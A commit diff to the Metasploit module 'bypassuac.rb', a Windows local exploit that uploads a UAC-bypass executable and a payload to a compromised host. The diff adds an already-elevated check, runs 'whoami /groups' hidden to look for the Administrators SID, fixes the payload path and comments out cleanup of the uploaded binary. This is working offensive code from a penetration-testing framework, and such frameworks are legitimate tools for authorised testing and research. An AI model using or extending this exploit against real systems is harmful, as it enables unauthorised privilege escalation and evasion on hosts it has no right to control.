add admin already and admin group checks

modules/exploits/windows/local/bypassuac.rb

@@ -50,6 +50,11 @@ class Metasploit3 < Msf::Exploit::Local
 
 	def exploit
 
+		isadmin = session.railgun.shell32.IsUserAnAdmin()
+		if isadmin['return']
+			print_error('Already in elevated state. Exiting...')
+			return
+		end
 
 		#
 		# Verify use against Vista+
@@ -95,6 +100,31 @@ class Metasploit3 < Msf::Exploit::Local
 			return
 		end
 
+		# Check if you are an admin
+		print_status('Checking admin status...')
+		whoami = session.sys.process.execute('cmd /c whoami /groups', 
+			nil,
+			{'Hidden' => true, 'Channelized' => true}
+			)
+		cmdout = []
+		isinadmins = []
+		while(cmdoutput = whoami.channel.read)
+			cmdout << cmdoutput
+		end
+		if cmdout.size == 0
+			print_error('Either whoami is not there or failed to execute')
+			print_error('Continuing under assumption you already checked...')
+		else
+			isinadmins = cmdout[0].split("\r\n").grep(/S-1-5-32-544/)
+			if isinadmins.size > 0
+				print_good('Part of Administrators group! Continuing...')
+			else
+				print_error('Not in admins group, cannot escalate with this module')
+				print_error('Exiting...')
+				return
+			end
+		end
+
 		#
 		# Generate payload and random names for upload
 		#
@@ -118,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Local
 		end
 
 		tmpdir = session.fs.file.expand_path("%TEMP%")
-		cmd = "#{tmpdir}\\#{bypass_uac_filename} /c %TEMP%\\#{payload_filename}"
+		cmd = "#{tmpdir}\\#{bypass_uac_filename} /c #{tmpdir}\\#{payload_filename}"
 
 		print_status("Uploading the bypass UAC executable to the filesystem...")
 
@@ -148,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Local
 		# delete the uac bypass payload
 		delete_file = "cmd.exe /c del #{tmpdir}\\#{bypass_uac_filename}"
 
-		session.sys.process.execute(delete_file, nil, {'Hidden' => true})
+		#session.sys.process.execute(delete_file, nil, {'Hidden' => true})
 	end
 end